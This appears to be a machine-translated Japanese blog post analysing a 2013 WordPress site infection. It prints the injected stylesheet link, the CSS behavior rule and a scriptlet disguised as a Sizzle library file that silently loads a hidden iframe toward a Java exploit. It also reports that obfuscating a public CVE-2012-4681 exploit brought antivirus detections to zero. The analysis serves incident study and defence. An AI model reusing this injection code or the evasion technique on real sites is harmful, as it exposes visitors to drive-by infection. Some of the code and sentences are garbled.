サイトの感染-例のある物語

悪意のあるコードをWordPressに挿入する（ 画像ソース ）

この物語は2013年3月28日から2013年4月4日までの間に始まります。 この期間中、サイトは******。Ruに感染しました。 これはarchive.orgで追跡できます。 次の行がページコードに表示されます。

<link rel="stylesheet" type="text/css" media="all" href="http://******.ru/wp-content/style.css" />
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

そのときにこのCSSを開くと、インターネットの反対側へのパスが始まります。

 body { behavior:url(http://******.ru/wp-content/wp-content/themes.sct); }
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

これは、ほとんど変更されていないthemes.sctファイルです。

 /* * Sizzle CSS Selector Engine - v0.9.3 * Copyright 2009, The Dojo Foundation * Released under the MIT, BSD, and GPL Licenses. * More information: http://sizzlejs.com/ */ /* This file create by Cms. Don't delete it! */ <sriptlet><implements type=behavior></implements><sript>xchk='_';xurl='\x08//goo.gl/1JvYY';(xifr=document.createElement('iframe')).style.display='none';doument.body.appendChild(xifr);with(xifr){id='xfid';addBehavior('#default#userData');load(xchk);if(!getAttribute(xchk)){setAttribute(xchk,'_');save(xchk);expires=(new Date((new Date()).getTime()+6e8)).toUTCString();src=xurl;}}</sript></scriptlet>
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

少なくとも私にとって、この「奇跡」をグーグルで調べても何も得られませんでした。 コードを* .htcファイルにコピーすると、操作は観察されませんでした。 これは0日である可能性があります。 IE7-8でテストされたパフォーマンス。 リンクgoo.gl/1JvYYは、justhaveown.myvnc.com / prok.phpにつながります。 5月中旬までに、リンクはすでに死んでいた。 しかし、攻撃者は少なくとも45日間、計画を達成するために1日あたり9,000人のユニークビジターのオーディエンスを抱えていました。 さらに、プロバイダー、国などによるフィルターを使用する可能性があります。



ロード可能なモジュールに関するいくつかの情報がここにあり、利用できない場合はキャッシュが見つかりました 。 結果はBBfrtY.jarファイルで、Microsoftの分類によれば、これはExploit：Java / CVE-2013-0422であることが判明しました。 securelist.comによると、流行は1月中旬に始まりました。 さらに、3か月前のサイトへのウイルス感染の兆候は、少なくとも1か月半はサイト管理者によって登録されていませんでした。 兆候とは、サイトディレクトリに外部のthemes.sctファイルが存在することを意味します。 archive.orgを信じている場合は、8月の最初の数日後にようやくウイルスの痕跡が削除されました。 archive.orgにはこの日付以降のスナップショットがないため、より正確に言うのは困難です。



残念ながら、これは非常に典型的な話です。 大規模なポータルが数時間または数日間もウイルスをホストできる場合でも。 著者は、1日あたり30万から40万人のユーザーが参加するニュースメディアのウェブサイトおよび10万人のユーザーがいる大きなラジオ局のポータルで、初夏にこのようなウイルス活動を個人的に観察しました。 ただし、小規模なサイトでは、何かがあることさえ認識されない場合があります。



この状況がどれほど現実的で再現性があるかをテストするために、CVE-2012-4681が選択され、 ここからのコードが選択されました 。 ProGuard 4.10およびthemes.sctファイルも取得されました。



virustotalのテスト結果：

• themes.sct - 0/47
• CVE-2012-4681.jar-17 / 47
• CVE-2012-4681.jar難読化後-0/47

つまり、PoCの公開から6か月後の現在でも、現在のJavaのエクスプロイトが脅威であると見なしているウイルス対策ソフトウェアはわずか36％です。 難読化すると、この数字はゼロになります。 ところで、一部のパッカー/プロテクターがPEファイルに対してこのような結果を達成できるかどうかは大きな疑問です。 数十年にわたる闘争の結果は、自分自身を感じさせます。



一方では、ファイルの整合性、データベース、またはパスワードの強度の監査が不十分であり、場合によっては単に「 ありがとうございます 。 月曜日に確認します。」 一方、新しい脅威に対する「シールド」の準備不足。

記事で使用されているすべてのリンクとファイルは、プライベートメッセージによって、またはコミュニティが出版物を適切と考える場合に提供できます。